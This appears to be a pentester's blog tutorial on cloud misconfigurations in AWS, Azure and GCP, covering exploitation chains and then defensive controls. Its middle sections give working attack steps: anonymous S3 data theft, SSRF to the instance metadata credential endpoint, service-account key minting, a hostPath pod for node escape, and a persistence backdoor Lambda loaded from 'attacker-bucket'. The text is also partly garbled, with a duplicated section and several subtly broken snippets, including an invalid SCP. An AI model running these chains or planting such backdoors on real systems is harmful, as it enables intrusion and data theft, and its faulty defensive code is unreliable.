Cloud Security Misconfigurations: Hunting for AWS, Azure, and GCP Vulnerabilities

Hey there, It's been a wild ride lately with all the cloud security assessments I've been conducting, and I thought I'd share some real-world insights from the trenches. If you're like me, you've probably noticed that cloud misconfigurations have become the gift that keeps on giving during penetration tests. Seriously, I've seen million-dollar companies with S3 buckets so open you could practically see them from space.
Today, I'm breaking down cloud security misconfigurations across AWS, Azure, and GCP, from the absolute basics to the advanced stuff that even seasoned cloud security pros might miss. Whether you're just starting out or you've been hunting cloud vulnerabilities for years, I promise you'll find something useful here. Grab your favorite caffeinated beverage , you're going to need it!
TECHNICAL SUMMARY: This comprehensive guide progresses from basic cloud security concepts to advanced exploitation techniques. You'll learn how to identify, exploit, and remediate misconfigurations across major cloud platforms using both manual techniques and specialized tools like ScoutSuite, Prowler, and Pacu.
Understanding the Cloud Security Basics
When I first started working with cloud environments, I was honestly overwhelmed. If you're new to cloud security, don't worry, I've been there too.
What Are Cloud Misconfigurations Anyway?
Cloud misconfigurations are essentially security settings that have been implemented incorrectly, leaving resources exposed to unauthorized access. Think of it like locking your front door but leaving all your windows wide open, technically you did something for security, but you missed the bigger picture.
Here's what makes cloud misconfigurations particularly dangerous:
Misconfiguration + Public Cloud = Publicly Accessible Vulnerability
I remember one of my first cloud assessments where a client was absolutely certain their AWS environment was secure. Within 30 minutes, I had access to their customer database through a misconfigured RDS instance. No fancy exploits, no zero-days, just a permission setting someone forgot to change.
The Shared Responsibility Model: It's Not All on AWS/Azure/GCP
The three major cloud providers, AWS, Azure, and GCP, all operate on a shared responsibility model. This means they secure the underlying infrastructure, but you are responsible for securing what you build on top of it. And that's where things often go wrong.
Why Cloud Misconfigurations Matter
Here's why these misconfigurations are so critical:
- They require no exploitation of code vulnerabilities
- They're incredibly common (even in security-conscious organizations)
- They can lead to catastrophic data breaches
- They're often simple to fix once identified
The Fundamental Security Concepts Across Cloud Providers
Before diving into specific platforms, let's understand the basic security principles that apply across all cloud environments:
- Identity and Access Management (IAM) - Controls who can access what
- Network Security - Manages what traffic can flow where
- Data Protection - Ensures sensitive information remains secure
- Logging and Monitoring - Helps detect suspicious activities
Now let's look at what these mean for each major cloud provider:
Security Concept | AWS | Azure | GCP |
---|---|---|---|
Identity Management | IAM | Azure AD | Cloud IAM |
Network Security | Security Groups, NACLs | Network Security Groups | VPC Firewall Rules |
Data Protection | KMS, S3 Bucket Policies | Azure Key Vault | Cloud KMS |
Logging | CloudTrail | Azure Monitor | Cloud Audit Logs |
Setting Up Your Testing Environment
Before we start poking around, let's set up a safe environment. Never test these techniques against production environments without explicit permission!
When I was starting out, these tools were absolute lifesavers:
For AWS:
# Install AWS CLI
pip install awscli
# Configure with limited permissions test account
aws configure
For Azure:
# Install Azure CLI
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
# Login with test account
az login
For GCP:
# Install Google Cloud SDK
curl https://sdk.cloud.google.com | bash
# Initialize with test account
gcloud init
QUICK REFERENCE: Always use dedicated testing accounts with scoped permissions. Never use production credentials for security testing.
Your First Cloud Security Assessment Tools
Don't worry about mastering everything at once. I started by simply learning how to list resources and check their permissions. Even this basic skill can uncover significant vulnerabilities.
- AWS CLI and Azure CLI - The command-line interfaces for basic reconnaissance
- AWS Config - For checking resource configurations
- Azure Security Center - For security recommendations
- Google Security Command Center - For GCP security insights
Essential Technical Skills for Cloud Security Testing
Now that we understand the fundamentals, let's get our hands dirty with some practical skills.
Manual Discovery Techniques
Let's start with manual discovery. I always begin here because it helps me understand the environment better than any automated tool.
Your First AWS Assessment
Let's start with AWS, which in my experience has the steepest learning curve but offers the most comprehensive tooling for security assessments.
For AWS S3 buckets, I often use simple DNS enumeration:
# Replace company-name with your target
for prefix in dev test staging prod backup data; do
host $prefix.company-name.s3.amazonaws.com
done
If it resolves, the bucket exists. Simple but effective.
Using AWS CLI for Basic Reconnaissance
I always start with these commands to get a lay of the land:
# List all S3 buckets
aws s3 ls
# Check for public S3 buckets (this won't catch everything)
aws s3api list-buckets --query "Buckets[].Name" --output text | xargs -I {} aws s3api get-bucket-acl --bucket {} --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"
# List IAM users
aws iam list-users
# List EC2 instances
aws ec2 describe-instances --query "Reservations[].Instances[].[InstanceId, State.Name, SecurityGroups[].GroupName]"
Don't expect to understand everything immediately. When I first ran these commands, I spent hours googling the output to understand what I was seeing!
Common AWS Misconfigurations to Look For
In my penetration testing experience, these are the AWS issues I consistently find:
- Public S3 buckets - Still amazingly common
- Overly permissive IAM roles - The "AdminAccess" policy attached to everything
- Security groups allowing traffic from 0.0.0.0/0 - Because who doesn't love the whole internet accessing your resources?
- Unencrypted EBS volumes - Especially those containing sensitive data
- Public RDS instances - Database exposure is more common than you'd think
Essential Azure Security Assessment
Next up is Azure, which has a different security model but similar principles.
Azure CLI Reconnaissance
These commands will get you started:
# List resource groups
az group list --output table
# List storage accounts (Azure's equivalent to S3)
az storage account list --output table
# Check for publicly accessible storage
az storage account list --query "[].{Name:name, Public:allowBlobPublicAccess}" --output table
# List VMs
az vm list --output table
Common Azure Misconfigurations
From my Azure assessments, I frequently encounter:
- Public storage containers - Similar to public S3 buckets
- Excessive role assignments - Often more permissions than necessary
- Network Security Groups with overly permissive rules - 0.0.0.0/0 strikes again
- Unencrypted storage accounts - Especially those with sensitive data
- Missing diagnostic settings - Making incident response nearly impossible
GCP Security Basics
Finally, let's look at Google Cloud Platform:
GCP CLI Reconnaissance
# List projects
gcloud projects list
# List storage buckets (GCP's equivalent to S3)
gsutil ls
# List Compute Engine instances
gcloud compute instances list
# Check IAM policies
gcloud projects get-iam-policy YOUR_PROJECT_ID
Common GCP Misconfigurations
In my GCP assessments, I commonly find:
- Public Cloud Storage buckets - A recurring theme across cloud providers
- Overly permissive IAM roles - Especially the Editor and Owner roles
- Default service account with excessive permissions - An easy oversight
- Compute instances with public IPs - Often unnecessary exposure
- Missing VPC Service Controls - Leading to potential data exfiltration
Automation: Your First Security Scan with ScoutSuite
When I'm in a time crunch, ScoutSuite is my go-to tool for quick assessments across all three major clouds. Here's how to use it:
# Install ScoutSuite if you haven't already
pip install scoutsuite
# For AWS
scout aws
# For Azure (requires additional setup)
scout azure --cli
# For GCP
scout gcp --user-account
The tool will create an HTML report showing security issues across your environment. I remember being shocked the first time I ran this against a client's environment, it found 87 critical issues in what they thought was a secure setup!
Intermediate Cloud Security Hunting
Now we're getting to the good stuff. At this level, we're looking for more subtle misconfigurations and chaining issues together.
Beyond the Basic Scan: Defensive Evasion and Deeper Discovery
When I'm conducting a real-world assessment, basic scans only tell part of the story. Let's look at how to dig deeper:
Advanced AWS Hunting
I've found these techniques particularly effective:
# Find EC2 instances with attached IAM roles (potential privilege escalation paths)
aws ec2 describe-instances --query "Reservations[].Instances[].[InstanceId, IamInstanceProfile.Arn]" --output text
# Identify Lambda functions with environment variables (potential secrets)
aws lambda list-functions --query "Functions[].[FunctionName, Environment.Variables]"
# Look for cross-account access
aws iam list-roles --query "Roles[?AssumeRolePolicyDocument.Statement[].Principal.AWS && AssumeRolePolicyDocument.Statement[].Principal.AWS != 'arn:aws:iam::ACCOUNT_ID:root']"
Enter Prowler: AWS Security Assessment on Steroids
Prowler is my go-to tool for AWS security assessments. It performs hundreds of checks based on AWS security best practices:
# Clone and install Prowler
git clone https://github.com/prowler-cloud/prowler
cd prowler
pip install -r requirements.txt
# Run all checks
./prowler -M csv,json -D prowler-output
Let's analyze a valuable check for S3 encryption:
# Check for unencrypted S3 buckets
./prowler -c extra759
Here's what the output might show:
[!] Finding: s3-bucket-no-default-encryption: Bucket company-backups does not have default encryption enabled
I like to look at Prowler's "extra" checks, which often find subtle issues:
prowler aws -c extra725
This checks for internal services exposed to the internet, a goldmine for penetration testers.
Privilege Escalation Techniques in AWS
One of my favorite techniques is looking for privilege escalation paths:
- Check for
iam:PassRole
permissions combined with services that can create resources - Look for resource policies that allow cross-account access
- Hunt for Lambda functions that could be exploited to run code with their permissions
Let me walk you through a real scenario I encountered:
I found a Lambda function with an IAM role that had iam:PassRole
permission. The function also had a misconfigured API Gateway that allowed me to trigger it with arbitrary input. By triggering the function with crafted input, I could make it create a new EC2 instance with an administrative role attached, instant privilege escalation!
Exploiting S3 Misconfigurations: A Practical Example
When I find a misconfigured S3 bucket, I first check if I can list objects:
aws s3 ls s3://company-backups/ --no-sign-request
If successful, I might see:
2023-01-01 12:34:56 1234567 customer-database-backup.sql
2023-01-02 12:34:56 2345678 production-environment-variables.sh
Jackpot! Now I can download these:
aws s3 cp s3://company-backups/customer-database-backup.sql . --no-sign-request
COMMON PITFALL: Many security professionals check only for public read access but forget to check for public write access, which can be just as dangerous (think: uploading malicious files).
Azure Advanced Techniques
For Azure environments, try these approaches:
# Find resources with managed identities
az resource list --query "[?identity]"
# Check for custom role definitions (often overly permissive)
az role definition list --custom-role-only true --output table
# Look for automation accounts (often have powerful credentials)
az automation account list --output table
Azure Attack Paths
In Azure, I often look for these attack vectors:
- Managed identities with excessive permissions
- Custom RBAC roles with dangerous combinations of permissions
- Automation accounts with runbooks that can be modified
- Contributor access on resource groups containing Key Vaults
GCP Advanced Hunting
For GCP, these techniques yield interesting results:
# Find service accounts and their roles
gcloud iam service-accounts list --format="table(email,displayName)"
gcloud projects get-iam-policy YOUR_PROJECT_ID --format="table(bindings.role,bindings.members)" --flatten="bindings[].members"
# Look for custom organization policies (or lack thereof)
gcloud resource-manager org-policies list --organization=YOUR_ORG_ID
# Check for custom roles
gcloud iam roles list --project=YOUR_PROJECT_ID
Enter Pacu: AWS Exploitation Framework
For AWS specifically, Pacu is an incredible tool for security testing:
# Install Pacu
pip install pacu
# Basic usage
pacu
> set_keys --profile default
> run iam__enum_users_roles_policies_groups
> run s3__enum
When I get my hands on AWS credentials, I immediately check what I can do with them using Pacu:
# Run the iam__privesc module to find privilege escalation paths
run iam__privesc
Pacu modules can chain together vulnerabilities in fascinating ways. I once used Pacu to:
- Enumerate S3 buckets
- Find a bucket with deployment scripts
- Discover AWS keys in those scripts
- Use those keys to pivot to production environments
The whole process took about 20 minutes, a stark reminder of how quickly misconfigurations can escalate.
Leveraging Cloud Metadata Services
One of my favorite techniques involves leveraging SSRF vulnerabilities to access cloud metadata services. In AWS EC2:
# If you can trigger an SSRF, point it to:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Then target the role name returned:
http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
This often returns temporary credentials you can use to pivot.
Advanced Cloud Security Testing
At this level, we're looking at sophisticated attack patterns that combine multiple misconfigurations.
Complex Attack Chains and Lateral Movement
The most devastating cloud attacks rarely exploit a single vulnerability, they chain multiple issues together.
AWS Example: The S3-Lambda-IAM Chain
I once encountered this attack chain:
- Found an S3 bucket with public write access
- Discovered the bucket triggered a Lambda function on new files
- Uploaded a crafted file that caused the Lambda to execute unexpected code
- Lambda had an attached role with administrative permissions
- Game over for that AWS account
The technical implementation looked something like:
# Upload a malicious file to the public bucket
aws s3 cp malicious_file.txt s3://vulnerable-bucket/
# The Lambda processes the file and executes our command
# We can extract credentials from the Lambda's environment
# Use those credentials to pivot
aws configure --profile stolen
aws iam get-user --profile stolen
Azure Attack Chain: Storage Account to Virtual Machine
In Azure, I've executed this chain:
- Found a publicly accessible storage account with SAS tokens in a config file
- Used the SAS token to access private blobs
- Found VM backup data containing credentials
- Used those credentials to access VMs in the environment
# Access the public storage account
az storage blob list --account-name vulnerable-account --container-name public-container
# Download files using discovered SAS token
az storage blob download --account-name vulnerable-account --container-name private-container --name config.json --sas-token "?sv=2020..."
# Use extracted credentials to access VMs
ssh admin@target-vm -i discovered_key.pem
GCP Attack Path: Service Account Impersonation
In GCP, this chain proved effective:
- Found a service account key in Cloud Storage
- The service account had
iam.serviceAccounts.actAs
permission - Used the service account to impersonate other service accounts
- Eventually gained access to a service account with Editor role
# Authenticate as the discovered service account
gcloud auth activate-service-account --key-file discovered-key.json
# List service accounts we can impersonate
gcloud iam service-accounts list
# Impersonate a target service account
gcloud iam service-accounts add-iam-policy-binding target-sa@project.iam.gserviceaccount.com --member serviceAccount:compromised-sa@project.iam.gserviceaccount.com --role roles/iam.serviceAccountUser
# Get credentials for the target account
gcloud iam service-accounts keys create key.json --iam-account target-sa@project.iam.gserviceaccount.com
# Authenticate as the target account
gcloud auth activate-service-account --key-file key.json
Kubernetes API Server Exposure
If you find a misconfigured Kubernetes cluster in any cloud:
# Check if the K8s API server is exposed
curl -k https://<cluster-ip>:6443/api/v1/namespaces
# If anonymous access is enabled, you might get a valid response
I can then try to create pods with host mounts to escalate to node access:
apiVersion: v1
kind: Pod
metadata:
name: attack-pod
spec:
containers:
- name: attack-container
image: ubuntu
command: ["sleep", "3600"]
volumeMounts:
- mountPath: /host
name: hostfs
volumes:
- name: hostfs
hostPath:
path: /
CloudGoat and CloudSploit: Training and Detection
To practice these techniques safely:
- Set up CloudGoat (AWS vulnerable-by-design environment)
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
./cloudgoat.py create iam_privesc_by_attachment
- Use CloudSploit for automated detection
git clone https://github.com/cloudsploit/scans.git
cd scans
npm install
./index.js --cloud aws
Cross-Service Attacks
The real power comes from chaining vulnerabilities across services. For example:
- Find an EC2 with an attached role with S3 read permissions
- Access S3 buckets containing cloud formation templates
- Extract hardcoded credentials from templates
- Use those credentials to access RDS databases
Expert Cloud Security Insights
At this level, we're looking at cutting-edge techniques and subtle misconfigurations that even experienced cloud security professionals might miss.
The Art of Cloud Privilege Escalation
Privilege escalation in cloud environments is an art form, combining deep knowledge of services and permissions models.
AWS: The Subtle Dangers of Resource-Based Policies
I've found that resource-based policies often contain unexpected permission combinations:
# Find KMS keys with problematic policies
aws kms list-keys --query 'Keys[*].KeyId' --output text | xargs -I {} aws kms get-key-policy --key-id {} --policy-name default --output text | grep -i "Principal\|Action\|Resource\|Effect" | grep -i "\"*\""
# Look for policies with NotAction (often overlooked)
aws iam list-policies --scope Local --query "Policies[*].[PolicyName,Arn]" --output text | xargs -I {} aws iam get-policy-version --policy-arn {} --version-id $(aws iam get-policy --policy-arn {} --query "Policy.DefaultVersionId" --output text) --query "PolicyVersion.Document" | grep -i "NotAction"
The most sophisticated AWS privilege escalation paths I've found involve:
- Service role trust relationships: Where cross-service confused deputy issues arise
- Resource policy wildcards: Particularly in KMS, SNS, SQS, and Lambda
- Chained permission boundaries: Where multiple policies must be analyzed together
Here's a real-world example I encountered: A Lambda function had a resource policy allowing a seemingly harmless service to invoke it. However, that service could be configured to pass arbitrary data to the Lambda. Combined with code that evaluated that data as commands, this created a remote code execution path that was extremely difficult to detect.
Azure: Managed Identity Manipulation
The most sophisticated Azure attacks often involve managed identities:
# Find user-assigned managed identities
az identity list --query "[].{Name:name, PrincipalId:principalId, ClientId:clientId, ResourceGroup:resourceGroup}" --output table
# Check what resources are using these identities
az resource list --query "[?identity].{Name:name, Type:type, ManagedIdentity:identity.principalId}" --output table
I've found that organizations often create managed identities with excessive permissions "just to make things work," not realizing they're creating significant privilege escalation paths.
One client had a web app with a managed identity that had Contributor rights to a resource group containing Azure Key Vault. By exploiting a simple XSS vulnerability in the web app, I could use the managed identity to access secrets in Key Vault, combining application security with cloud misconfiguration.
GCP: Service Account Key Management
In GCP, service account key management is often the weakest link:
# List service accounts with keys
gcloud iam service-accounts keys list --iam-account=TARGET_SERVICE_ACCOUNT@PROJECT_ID.iam.gserviceaccount.com
# Check if service account impersonation is possible
gcloud projects get-iam-policy PROJECT_ID --filter="bindings.members:SERVICE_ACCOUNT_EMAIL AND bindings.role:roles/iam.serviceAccountTokenCreator"
I've found organizations that rotate service account keys but don't actually revoke the old ones, leading to a situation where compromised keys remain valid indefinitely.
Zero-Day Hunting in Cloud Services
At this level, you're looking for novel vulnerabilities. My approach:
- Study API interactions using AWS CloudTrail, Azure Activity Logs, or GCP Cloud Audit Logs
- Look for race conditions in resource provisioning
- Test for logic flaws in IAM evaluation
- Analyze how metadata services validate requests
- Explore container escape techniques in managed services
Advanced Persistence Techniques
Once you have access, maintaining it requires subtlety:
# Create backdoor AWS Lambda with minimal logging
aws lambda create-function \
--function-name "monitoring-service" \
--runtime python3.9 \
--role arn:aws:iam::account-id:role/service-role/minimal-logging-role \
--handler lambda_function.lambda_handler \
--code S3Bucket=attacker-bucket,S3Key=backdoor.zip
The most efficient backdoors use legitimate services in unexpected ways:
- CloudWatch Events to trigger actions on schedule
- Lambda layers to hide malicious code
- IAM policy versions to maintain access
- S3 event notifications for command and control
Custom Tools and Techniques
At this level, standard tools don't always cut it. I've developed custom scripts for specific scenarios:
# Simple AWS cross-account access checker
import boto3
import json
def check_assume_role_policy(role_name):
iam = boto3.client('iam')
try:
role = iam.get_role(RoleName=role_name)
policy = json.loads(role['Role']['AssumeRolePolicyDocument'])
for statement in policy['Statement']:
if statement['Effect'] == 'Allow' and 'AWS' in statement['Principal']:
if isinstance(statement['Principal']['AWS'], list):
for principal in statement['Principal']['AWS']:
if not principal.startswith('arn:aws:iam::' + account_id):
print(f"WARNING: Role {role_name} can be assumed by external account: {principal}")
else:
principal = statement['Principal']['AWS']
if not principal.startswith('arn:aws:iam::' + account_id):
print(f"WARNING: Role {role_name} can be assumed by external account: {principal}")
except Exception as e:
print(f"Error checking role {role_name}: {e}")
More sophisticated AWS analysis script:
import boto3
import json
def check_cross_account_access():
"""Check for potential cross-account access issues"""
iam = boto3.client('iam')
# Get all roles
roles = iam.list_roles()['Roles']
for role in roles:
policy_document = role['AssumeRolePolicyDocument']
# Look for cross-account trust relationships
for statement in policy_document['Statement']:
if 'AWS' in statement.get('Principal', {}):
principal = statement['Principal']['AWS']
# Handle both string and list principals
principals = [principal] if isinstance(principal, str) else principal
for p in principals:
if 'arn:aws:iam::' in p and not p.endswith(':root') and ':role/' not in p:
print(f"Potential issue: Role {role['RoleName']} trusts external principal {p}")
if __name__ == "__main__":
check_cross_account_access()
Custom Azure security assessment script:
from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.authorization import AuthorizationManagementClient
import re
def check_custom_role_permissions():
"""Check for dangerous permissions in custom roles"""
credential = DefaultAzureCredential()
subscription_id = "YOUR_SUBSCRIPTION_ID"
auth_client = AuthorizationManagementClient(credential, subscription_id)
# Get all custom roles
roles = auth_client.role_definitions.list(scope=f"/subscriptions/{subscription_id}")
dangerous_actions = ["Microsoft.Authorization/*/write", "Microsoft.Network/networkSecurityGroups/write"]
for role in roles:
if role.role_type == "CustomRole":
for permission in role.permissions:
for action in permission.actions:
for dangerous in dangerous_actions:
if re.match(dangerous.replace("*", ".*"), action):
print(f"Dangerous permission {action} found in custom role {role.role_name}")
if __name__ == "__main__":
check_custom_role_permissions()
Multi-Cloud Attack Paths
The real complexity emerges in multi-cloud environments. I've seen cases where:
- A misconfigured Azure AD allowed access to federated AWS accounts
- AWS temporary credentials were stored in GCP secrets
- GCP service accounts had overly permissive roles
Each environment by itself seemed secure, but the combination created an attack path.
Decision Tree for Cloud Exploitation
Here's my decision flow when conducting advanced cloud assessments:
- Identify authentication boundaries
- Map trust relationships between services
- Locate potential privilege escalation paths
- Identify data storage locations
- Target monitoring/logging infrastructure
- Attempt to bypass network controls
Defending the Cloud: The Security Engineer's Perspective
As someone who works on both sides of the security fence, I've developed some key insights for defending cloud environments:
AWS Security Best Practices from the Trenches
After finding hundreds of AWS misconfigurations, here's what actually works:
- Use AWS Organizations with Service Control Policies (SCPs) to enforce guardrails across all accounts
- Implement the principle of least privilege using Permission Boundaries
- Enable GuardDuty, AWS Config, and CloudTrail in all accounts and regions
- Use VPC Endpoints to keep traffic private
- Implement a strong tagging strategy for visibility and governance
The most effective defense I've seen is a "default deny" approach using SCPs:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPublicS3Buckets",
"Effect": "Deny",
"Action": [
"s3:PutBucketPublicAccessBlock",
"s3:PutBucketPolicy",
"s3:PutBucketAcl"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"s3:PublicAccessBlockConfiguration": "false"
}
}
}
]
}
This prevents any account in the organization from creating public S3 buckets, regardless of IAM permissions.
Azure Defense in Depth
For Azure environments, I recommend:
- Use Azure Policy to enforce security standards
- Implement Privileged Identity Management (PIM) for just-in-time admin access
- Deploy Microsoft Defender for Cloud across all subscriptions
- Use Private Link for secure service connections
- Implement Azure Active Directory Conditional Access for identity protection
Here's an example of an effective Azure Policy that prevents public storage accounts:
{
"properties": {
"displayName": "Storage accounts should prohibit public access",
"policyType": "BuiltIn",
"mode": "Indexed",
"parameters": {},
"policyRule": {
"if": {
"allOf": [
{
"field": "type",
"equals": "Microsoft.Storage/storageAccounts"
},
{
"field": "Microsoft.Storage/storageAccounts/allowBlobPublicAccess",
"equals": "true"
}
]
},
"then": {
"effect": "deny"
}
}
}
}
GCP Security Controls
For GCP, these controls have proven most effective:
- Implement Organization Policy Constraints to enforce security standards
- Use VPC Service Controls to create security perimeters
- Deploy Security Command Center Premium for threat detection 4
GCP Security Controls (continued)
For GCP, these controls have proven most effective:
- Implement Organization Policy Constraints to enforce security standards
- Use VPC Service Controls to create security perimeters
- Deploy Security Command Center Premium for threat detection
- Implement Custom Roles with least privilege
- Use Cloud Asset Inventory for continuous discovery and assessment
Let me show you a practical example of implementing an Organization Policy constraint to prevent public Cloud Storage buckets:
gcloud resource-manager org-policies set-policy --organization=ORGANIZATION_ID policy.yaml
Where policy.yaml contains:
constraint: storage.publicAccessPrevention
listPolicy:
allValues: ENFORCED
This simple configuration ensures no one in your organization can create public buckets, a common source of data breaches I've seen repeatedly in assessments.
VPC Service Controls: Security Perimeters Done Right
One of my favorite GCP security features is VPC Service Controls. I've seen this single control prevent what would have otherwise been catastrophic data exfiltration scenarios.
# Create a perimeter around sensitive services
gcloud access-context-manager perimeters create PERIMETER_NAME \
--title="Production Data Perimeter" \
--resources=projects/PROJECT_NUMBER \
--restricted-services=storage.googleapis.com,bigquery.googleapis.com
A real example I encountered: a client had sensitive medical data in BigQuery that researchers needed to query. Rather than allowing full access to the data, we implemented VPC Service Controls with an access level that only allowed connections from approved networks. This prevented data exfiltration while enabling legitimate research.
Custom IAM Roles: The Art of Least Privilege
Unlike AWS and Azure, GCP's predefined roles are often too permissive. I recommend creating custom roles for specific job functions:
# Create a custom role for storage management only
gcloud iam roles create storageManager --project=PROJECT_ID \
--title="Storage Manager" \
--description="Manage GCS buckets without delete permission" \
--permissions=storage.buckets.create,storage.buckets.get,storage.buckets.list,storage.buckets.update
This approach ensures your teams have exactly the permissions they need, nothing more, nothing less.
Near-Expert Cloud Security Testing
This is where we separate the cloud security professionals from the true cloud security masters. We're looking at subtle, complex vulnerabilities that require deep understanding of cloud architecture.
Advanced GCP Attack Scenarios
GCP Workload Identity Federation Exploitation
I recently discovered a fascinating attack path involving GCP's Workload Identity Federation:
# List workload identity pools
gcloud iam workload-identity-pools list --location=global
# Check workload identity pool providers
gcloud iam workload-identity-pools providers list \
--workload-identity-pool=POOL_ID \
--location=global
The vulnerability arose when a client configured Workload Identity Federation with GitHub Actions but used overly permissive attribute mappings. An attacker who could create a GitHub repository with a specific name could effectively impersonate the identity and gain access to GCP resources.
The fix involved tightening the attribute mapping:
gcloud iam workload-identity-pools providers update-oidc github-provider \
--workload-identity-pool=POOL_ID \
--location=global \
--attribute-mapping="google.subject=assertion.sub,attribute.repository=assertion.repository,attribute.repository_owner=assertion.repository_owner" \
--attribute-condition="attribute.repository_owner=='legitimate-org'"
GCP Organization Policy Bypass Techniques
Organization policies are powerful, but I've found several bypass techniques:
- Older API versions that don't enforce certain constraints
- Service account impersonation to a service account with org policy exemptions
- Resource hierarchy manipulation by creating projects under different folders
Here's a script to identify potential org policy bypasses:
from google.cloud import resourcemanager_v3
from google.cloud import orgpolicy_v2
def find_policy_bypasses(organization_id):
client = resourcemanager_v3.ProjectsClient()
policy_client = orgpolicy_v2.OrgPolicyClient()
# List all projects in the organization
parent = f"organizations/{organization_id}"
projects = client.list_projects(request={"parent": parent})
for project in projects:
# Check for custom org policies at project level
policies = policy_client.list_policies(request={"parent": project.name})
for policy in policies:
if policy.spec.rules:
for rule in policy.spec.rules:
if hasattr(rule, 'allow_all') and rule.allow_all:
print(f"WARNING: Project {project.display_name} has an allow_all rule for {policy.name}")
if __name__ == "__main__":
find_policy_bypasses("YOUR_ORGANIZATION_ID")
Multi-Cloud Security Challenges
Working across AWS, Azure, and GCP simultaneously creates unique security challenges I've had to solve for several clients.
Identity Federation and Access Management
The most complex multi-cloud vulnerabilities often involve identity federation:
import boto3
import azure.identity
import google.auth
def check_cross_cloud_trust_relationships():
# Check AWS trusted entities
aws_iam = boto3.client('iam')
roles = aws_iam.list_roles()['Roles']
for role in roles:
policy = role['AssumeRolePolicyDocument']
for statement in policy['Statement']:
if 'AWS' in statement.get('Principal', {}):
principal = statement['Principal']['AWS']
principals = [principal] if isinstance(principal, str) else principal
for p in principals:
if 'arn:aws:iam::' in p and not p.endswith(':root'):
print(f"AWS role {role['RoleName']} trusts external principal {p}")
# Check GCP service account external access
# This requires additional implementation based on your environment
Centralized Logging and Security Monitoring
One of the most effective defenses I've implemented for multi-cloud environments is centralized logging:
# Export GCP logs to a central SIEM
gcloud logging sinks create multi-cloud-logs storage.googleapis.com/central-security-logs \
--log-filter='severity>=WARNING'
# Similar configurations needed for AWS CloudTrail and Azure Activity Logs
The key is normalizing the log formats across providers, something I've accomplished using cloud functions that process and standardize logs before forwarding them to a SIEM like Splunk or Elastic.
Emerging Cloud Security Threats
Let's look at some cutting-edge attack vectors and how to defend against them.
Container Escape Techniques in Managed Services
Managed Kubernetes services (GKE, EKS, AKS) present unique security challenges. I've found these vulnerabilities particularly concerning:
- Host path volume mounts allowing container escape
- Privileged containers with excessive capabilities
- Node metadata API access enabling credential theft
This GKE security script helps identify potential container escape paths:
from kubernetes import client, config
def check_gke_container_security():
config.load_kube_config()
v1 = client.CoreV1Api()
pods = v1.list_pod_for_all_namespaces(watch=False)
for pod in pods.items:
# Check for hostPath volumes
for volume in pod.spec.volumes:
if hasattr(volume, 'host_path') and volume.host_path:
print(f"WARNING: Pod {pod.metadata.name} has hostPath volume: {volume.host_path.path}")
# Check for privileged containers
for container in pod.spec.containers:
if container.security_context and container.security_context.privileged:
print(f"WARNING: Pod {pod.metadata.name} has privileged container: {container.name}")
if __name__ == "__main__":
check_gke_container_security()
Serverless Security Challenges
Serverless computing (Cloud Functions, Lambda, Azure Functions) introduces new attack vectors:
- Function event data injection leading to code execution
- Dependencies with vulnerabilities in function packages
- Insecure temporary storage in /tmp directories
Here's a GCP Cloud Functions security review script:
from google.cloud import functions_v1
def audit_cloud_functions(project_id):
client = functions_v1.CloudFunctionsServiceClient()
parent = f"projects/{project_id}/locations/-"
functions = client.list_functions(request={"parent": parent})
for function in functions:
# Check for public invocation
if "allUsers" in function.iam_policy.bindings:
print(f"WARNING: Function {function.name} is publicly invocable")
# Check for excessive permissions
if function.service_account_email == f"{project_id}@appspot.gserviceaccount.com":
print(f"WARNING: Function {function.name} uses default service account")
# Additional checks specific to your environment
Zero-Trust Cloud Architecture
At the expert level, our goal is to implement zero-trust principles across cloud environments.
BeyondCorp for GCP Resources
Google's BeyondCorp approach to zero-trust is powerful when properly implemented:
# Configure IAP for web applications
gcloud compute backend-services update BACKEND_SERVICE \
--iap=enabled,oauth2-client-id=CLIENT_ID,oauth2-client-secret=CLIENT_SECRET
This ensures that access to applications is controlled by identity, not network location, a fundamental shift from traditional perimeter-based security.
Securing Service-to-Service Communication with Workload Identity
For GCP microservices, Workload Identity provides zero-trust authentication:
# Configure a GKE cluster with Workload Identity
gcloud container clusters update CLUSTER_NAME \
--workload-pool=PROJECT_ID.svc.id.goog
# Then create a mapping between K8s service accounts and GCP service accounts
kubectl annotate serviceaccount KSA_NAME \
iam.gke.io/gcp-service-account=GSA_NAME@PROJECT_ID.iam.gserviceaccount.com
This eliminates the need for service account keys, removing a major attack vector I've exploited countless times.
Binary Authorization for Container Security
GCP's Binary Authorization provides cryptographic verification of container images:
# Enable Binary Authorization for GKE
gcloud container clusters update CLUSTER_NAME \
--binauthz-evaluation-mode=PROJECT_DEFAULT
# Create an attestor
gcloud container binauthz attestors create secure-build-attestor \
--attestation-authority-note=projects/PROJECT_ID/notes/secure-build-note \
--attestation-authority-note-project=PROJECT_ID
This ensures only approved, signed container images can be deployed, mitigating supply chain attacks.
Cloud Security at Scale: The Enterprise Perspective
After working with Fortune 500 companies on their cloud security, I've developed some key insights for securing cloud environments at scale.
Infrastructure as Code Security Scanning
Catching misconfigurations before deployment is far more effective than remediation:
# Example using Checkov for Terraform scanning
pip install checkov
checkov -d /path/to/terraform/code --framework terraform
# For Kubernetes manifests
checkov -d /path/to/kubernetes/manifests --framework kubernetes
This identifies security issues before they make it to production, a critical shift-left approach.
Automated Remediation Workflows
For large-scale environments, automation is key:
from google.cloud import securitycenter_v1
def remediate_public_buckets(organization_id):
client = securitycenter_v1.SecurityCenterClient()
# Find all public storage findings
parent = f"organizations/{organization_id}"
findings = client.list_findings(
request={
"parent": parent,
"filter": "category=\"PUBLIC_BUCKET_ACL\""
}
)
for finding in findings:
# Extract bucket name from finding
bucket_name = finding.resource_name.split('/')[-1]
# Remediate by removing public access
print(f"Remediating public access for bucket: {bucket_name}")
# Implement actual remediation code here
Security Posture Management Dashboard
For executive visibility, I've built custom security dashboards:
def generate_cloud_security_posture_metrics():
metrics = {
'aws': {
'critical_findings': 0,
'high_findings': 0,
'compliance_percentage': 0,
},
'azure': {
'critical_findings': 0,
'high_findings': 0,
'compliance_percentage': 0,
},
'gcp': {
'critical_findings': 0,
'high_findings': 0,
'compliance_percentage': 0,
}
}
# Populate with actual data from your cloud environments
